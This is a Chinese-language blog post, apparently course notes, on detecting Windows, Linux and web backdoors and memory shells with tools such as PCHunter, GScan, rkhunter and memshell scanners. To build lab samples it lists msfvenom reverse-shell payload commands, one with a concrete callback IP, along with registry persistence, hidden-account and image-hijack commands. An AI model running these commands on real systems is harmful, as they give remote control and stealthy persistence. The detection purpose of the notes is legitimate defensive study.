后门攻击检测指南--windowsLinuxweb

embedded/2024/11/14 2:13:06/

免责声明:本文仅做技术交流与学习...

目录

Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

关于Rootkit的检测:

web层面-后门--内存马


Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

火绒剑--系统--开始监控 	等等 --分析进程,数字签名,对外连接,IP,	文件上传分析
火绒剑-->(自)启动项 --找找找隐藏用户
映像劫持	--PCHunter1.56工具屏保&登录	--火绒剑-启动项

... 

Windows 实验 
1、常规 MSF 后门-分析检测 
2、权限维持后门-分析检测 
3、Web 程序内存马-分析检测 常见工具集合: 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 常规后门: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx 
lport=6666 -f exe -o shell.exe 自启动测试: (注册表添加自启动项目)
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V 
"backdoor" /t REG_SZ /F /D "C:\shell.exe" 隐藏账户: 
net user xiaodi$ xiaodi!@#X123 /add 映像劫持 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d 
"C:\Windows\System32\cmd.exe /c calc" 屏保&登录 
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE 
/t REG_SZ /d "C:\shell.exe" /f 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D 
"C:\shell.exe" 
=============================================================================================== 

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

Linux:
msf生成elfnetstat -anpt
kill 进程号
rm 文件rookit后门:
流量抓不到--足够隐藏
后门权限非常高	(驱动)工具箱:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 	
rookit检测

Linux 实验 
1、常规 MSF 后门-分析检测 
2、Rootkit 后门-分析检测 
3、权限维持后门-分析检测 
4、Web 程序内存马-分析检测 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 常规后门: 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf 
Rootkit 后门:GScan rkhunter 权限维持后门:GScan rkhunter 
1、GScan 
https://github.com/grayddq/GScan 
python GScan.py 
2、rkhunter 
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz
cd rkhunter-1.4.6
./installer.sh   	--layout		default		--install
rkhunter -c
(集成了多个特征而已)
--检测不到啊
.
.
.rookit  内存马  6666666666666666666EDR?青藤?

关于Rootkit的检测:

linux平台下:chkrootkit、rkhunter、OSSEC、zeppoo等
Windows平台下:BlackLight、RootkitRevealer、Rootkit Hook Analyzer 

Gscan:GitHub - grayddq/GScan: 本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。


web层面-后门--内存马

Web层面:
通用系统层面
1、常规后门
2、内存马(无文件马)
PHP	php内存马  ---146	--重启服务--再删
.NET
JAVA
Pythonjava内存马:
哥斯拉注入	--有不同类型
冰蝎		--河马,,,,等等检测	--发现	有的需要dump下载下来分析		kill
(工具脚本一些不支持,中间件,语言等等)--------------------------
手工分析:
一些不支持,就手工分析,调试
cop.jar
arthas-boot.jar		--能看到实时的内存变化

.NET: https://github.com/yzddmr6/ASP.NET-Memshell-Scanner		
asp.NET脚本 特定检测.删除	--(ASP.NET-Memshell-Scanner-master)
jsp: 	hmws工具检测(不行就运行2次试试)河马有问题...
PHP: 常规后门查杀检测后,中间件重启后删除文件即可
JAVA:河马版本,其他优秀项目
java-memshell-scanner-master工具检测tomcat.		--支持tomcat所有


http://www.ppmy.cn/embedded/58241.html

相关文章

VBA实现Excel的数据透视表

前言 本节会介绍通过VBA的PivotCaches.Create方法实现Excel创建新的数据透视表、修改原有的数据透视表的数据源以及刷新数据透视表内容。 本节测试内容以下表信息为例 1、创建数据透视表 语法:PivotCaches.Create(SourceType, [SourceData], [Version]) 说明&am…

发表EI会议论文-对考研生和研究生都有好处!

EI论文对考研和保研的帮助主要体现在以下几个方面: 对考研的帮助 1.复试加分:在考研过程中,复试阶段是关键,拥有EI论文可以证明考生具备一定的科研能力,给考官留下深刻印象,有助于提高复试通过率。 2.学…

谷粒商城----通过缓存和分布式锁获取数据。

高并发下缓存失效的问题 高并发下缓存失效的问题--缓存穿透 指查询一个一定不存在的数据,由于缓存是不命中,将去查询数据库,但是数据库也无此记录,我们没有将这次查询的不写入缓存,这将导致这个不存在的数据每次请求…

go获取正在运行的函数并及时捕获panic

Go 语言中,panic 是一种运行时错误,它会导致当前 goroutine 立即停止执行,并开始逐层向上返回,直到被 recover 捕获或者程序崩溃。panic 通常用于异常情况,比如程序遇到了无法恢复的错误。 捕获 panic 的主要作用包括…

Unity3D 资源管理YooAsset原理分析与详解

引言 Unity3D 是一款广泛应用于游戏开发、虚拟现实(VR)、增强现实(AR)等领域的强大游戏开发引擎。在开发过程中,资源管理是一项至关重要的任务,它直接影响到游戏的性能和用户体验。YooAsset 是一个基于 Un…

软件运行次数

题目: 实现一个验证程序运行次数的小程序,要求如下: 当程序运行超过3次时给出提示:本软件只能免费使用3次,欢迎您注册会员后继续使用~程序运行演示如下: 第一次运行控制台输出:欢迎…

VirtualBox 安装 Ubuntu Server24.04

环境: ubuntu-2404-server、virtualbox 7.0.18 新建虚拟机 分配 CPU 核心和内存(根据自己电脑实际硬件配置选择) 分配磁盘空间(根据自己硬盘实际情况和需求分配即可) 设置网卡,网卡1 负责上网&#xff0c…

找不到msvcr120.dll无法继续执行代码的原因分析及解决方法

我们可以使用一种科学的方法解决msvcr120.dll丢失的问题。这是由于日常使用电脑时的不当操作,可能会导致一些dll文件的丢失。对于这种情况,我们可以谨慎地修复来解决。 一、首先让我们了解msvcr120.dll是什么及重要性 msvcr120.dll 是微软公司开发的Vis…